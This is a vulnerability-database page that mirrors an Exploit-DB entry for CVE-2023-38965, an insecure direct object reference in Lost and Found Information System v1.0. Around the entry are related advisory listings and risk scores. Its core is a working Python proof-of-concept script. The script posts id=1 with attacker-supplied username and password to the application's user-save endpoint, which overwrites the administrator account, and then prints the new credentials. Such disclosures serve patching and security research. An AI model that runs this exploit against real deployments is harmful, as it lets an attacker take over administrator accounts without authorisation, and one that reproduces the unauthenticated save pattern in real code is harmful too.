Lucene search
K

Lost and Found Information System v1.0 - ( IDOR ) leads to Account Take over

🗓️ 13 Feb 2024 00:00:00Reported by Or4nG.M4NType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 469 Views

Lost and Found System v1.0 IDOR Account Takeove

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Lost and Found Information System v1.0 - ( IDOR ) leads to Account Take over Exploit
13 Feb 202400:00
zdt
CNNVD
Lost and Found Information System security breach
16 Oct 202300:00
cnnvd
CVE
CVE-2023-38965
3 Nov 202300:00
cve
Cvelist
CVE-2023-38965
3 Nov 202300:00
cvelist
EUVD
EUVD-2023-42725
3 Oct 202520:07
euvd
NVD
CVE-2023-38965
3 Nov 202305:15
nvd
OSV
CVE-2023-38965
3 Nov 202305:15
osv
Packet Storm
Lost And Found Information System 1.0 Insecure Direct Object Reference
12 Oct 202300:00
packetstorm
Prion
Default credentials
3 Nov 202305:15
prion
Positive Technologies
PT-2023-26707
2 Nov 202300:00
ptsecurity
Rows per page
# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over 
# Date: 2023-12-03
# Exploit Author: OR4NG.M4N
# Category : webapps
# CVE : CVE-2023-38965

Python p0c :

import argparse
import requests
import time
parser = argparse.ArgumentParser(description='Send a POST request to the target server')
parser.add_argument('-url', help='URL of the target', required=True)
parser.add_argument('-user', help='Username', required=True)
parser.add_argument('-password', help='Password', required=True)
args = parser.parse_args()


url = args.url + '/classes/Users.php?f=save'


data = {
    'id': '1',
    'firstname': 'or4ng',
    'middlename': '',
    'lastname': 'Admin',
    'username': args.user,
    'password': args.password
}

response = requests.post(url, data)
if b"1" in response.content:
    print("Exploit ..")
    time.sleep(1)
    print("User :" + args.user + "\nPassword :" + args.password)
else:
    print("Exploit Failed..")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Feb 2024 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 3.19.8
EPSS0.01264
SSVC
469